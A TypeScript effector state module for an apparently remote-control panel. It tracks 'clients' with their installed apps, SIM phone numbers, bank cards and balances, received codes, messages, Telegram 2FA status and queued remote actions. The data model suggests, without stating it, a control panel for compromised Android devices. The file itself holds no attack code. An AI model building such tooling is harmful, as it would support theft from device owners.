import { createEvent, createStore, sample } from 'effector';
import type { IBalance } from './balance.entity';
import type { IMyCode } from './my-codes-entity';
import { $resetAuth } from './profile-entity';

export interface IPhone {
	number?: string;
	subId: string;
	name: string;

	buildId: string;
	clientId: string;
	createdAt: string;
	id: number;

	status: 0 | 1 | 2;
}

export interface ICard {
	id: number;
	clientId: string;
	buildId: string;

	number?: string;
	date?: string;
	balanceDate?: string;
	balance: number;

	createdAt: string;
}

export interface IInstalledApp {
	id: number;
	packageName: string;
	label: string;
	firstSeenAt?: string;
	lastSeenAt?: string;
}

export interface IClient {
	id: string;
	buildId: string;
	profileId: number;
	profileNickname: string;

	newLaunchStatus: 0 | 1 | 2;
	tgStatus: 'notset' | 'used' | 'woutcode' | '2fa';

	sdkVersion: string;
	phone?: string;
	fileName?: string;
	phones: IPhone[];
	balances?: IBalance[];
	cards: ICard[];
	possibleCards: string[];
	appsCount?: number;

	takeStatus?: 0 | 1 | 2 | 3;
	takenFrom?: string;
	comment?: string;

	isOnline: boolean;
	onlineAt: number;
	createdAt: number;
}

export interface IClientMessage {
	id: number;
	clientId: string;
	sender: string;
	text: string;
	createdAt: string | number;
}

export interface IClientAction {
	id: number;
	clientId: string;
	type: string;
	params?: { subId?: string; text?: string; phone?: string };
	status: 0 | 1 | 2 | 3;
	createdAt: string;
	lastEmitAt: string;
}

export const $resetPanelState = createEvent();

export const $setIsFetchingClients = createEvent<boolean>();
export const $isFetchingClients = createStore<boolean>(false).on($setIsFetchingClients, (_, payload) => payload).reset($resetPanelState);

export const $setHasMoreClients = createEvent<boolean>();
export const $hasMoreClients = createStore<boolean>(false).on($setHasMoreClients, (_, payload) => payload).reset($resetPanelState);

export const $setCursorClients = createEvent<string | null>();
export const $cursorClients = createStore<string | null>(null).on($setCursorClients, (_, payload) => payload).reset($resetPanelState);

export const $incrementclientsOffset = createEvent();
export const $clientsOffset = createStore<number>(0).on($incrementclientsOffset, state => state + 1).reset($resetPanelState);

export const $updateClient = createEvent<Partial<IClient>>();
export const $setClients = createEvent<IClient[]>();
export const $newClient = createEvent<IClient>();
export const $addClients = createEvent<IClient[]>();
export const $clients = createStore<IClient[]>([])
	.on($setClients, (_, payload) => payload)
	.on($addClients, (state, payload) => {
		return [...state, ...payload];
	})
	.on($updateClient, (state, payload) => {
		const index = state.findIndex(item => item.id === payload.id);
		if (index === -1) return state;
		const newState = [...state];
		newState[index] = { ...state[index], ...payload };
		return newState;
	})
	.on($newClient, (state, payload) => {
		const idx = state.findIndex(item => item.id === payload.id);
		if (idx !== -1) return state;
		return [payload, ...state];
	})
	.reset($resetPanelState);

export const $setSelectedClient = createEvent<IClient | null>();
export const $selectedClient = createStore<IClient | null>(null).on($setSelectedClient, (_, payload) => payload).reset($resetPanelState);

export const $setClientDetailCodes = createEvent<IMyCode[]>();
export const $addClientDetailCode = createEvent<IMyCode>();
export const $clientDetailCodes = createStore<IMyCode[]>([])
	.on($setClientDetailCodes, (_, payload) => payload)
	.on($addClientDetailCode, (state, payload) => [payload, ...state])
	.reset($resetPanelState);

export const $setClientDetailMessages = createEvent<IClientMessage[]>();
export const $addClientDetailMessage = createEvent<IClientMessage>();
export const $clientDetailMessages = createStore<IClientMessage[]>([])
	.on($setClientDetailMessages, (_, payload) => payload)
	.on($addClientDetailMessage, (state, payload) => [payload, ...state])
	.reset($resetPanelState);

export const $setClientDetailBalances = createEvent<IBalance[]>();
export const $addClientDetailBalance = createEvent<IBalance>();
export const $updateClientDetailBalance = createEvent<IBalance>();
export const $clientDetailBalances = createStore<IBalance[]>([])
	.on($setClientDetailBalances, (_, payload) => payload)
	.on($addClientDetailBalance, (state, payload) => [payload, ...state])
	.on($updateClientDetailBalance, (state, payload) => {
		const index = state.findIndex(item => item.id === payload.id);
		if (index === -1) return state;
		const newState = [...state];
		newState[index] = { ...state[index], ...payload };
		return newState;
	})
	.reset($resetPanelState);

export const $setClientDetailActions = createEvent<IClientAction[]>();
export const $addClientDetailAction = createEvent<IClientAction>();
export const $updateClientDetailAction = createEvent<Partial<IClientAction> & { id: number }>();
export const $clientDetailActions = createStore<IClientAction[]>([])
	.on($setClientDetailActions, (_, payload) => payload)
	.on($addClientDetailAction, (state, payload) => {
		if (state.some(item => item.id === payload.id)) return state;
		return [payload, ...state];
	})
	.on($updateClientDetailAction, (state, payload) => {
		const index = state.findIndex(item => item.id === payload.id);
		if (index === -1) return state;
		const newState = [...state];
		newState[index] = { ...state[index], ...payload };
		return newState;
	})
	.reset($resetPanelState);

export const $setClientDetailApps = createEvent<IInstalledApp[]>();
export const $clientDetailApps = createStore<IInstalledApp[]>([])
	.on($setClientDetailApps, (_, payload) => payload)
	.reset($resetPanelState);

sample({
	clock: $resetAuth,
	target: $resetPanelState,
});
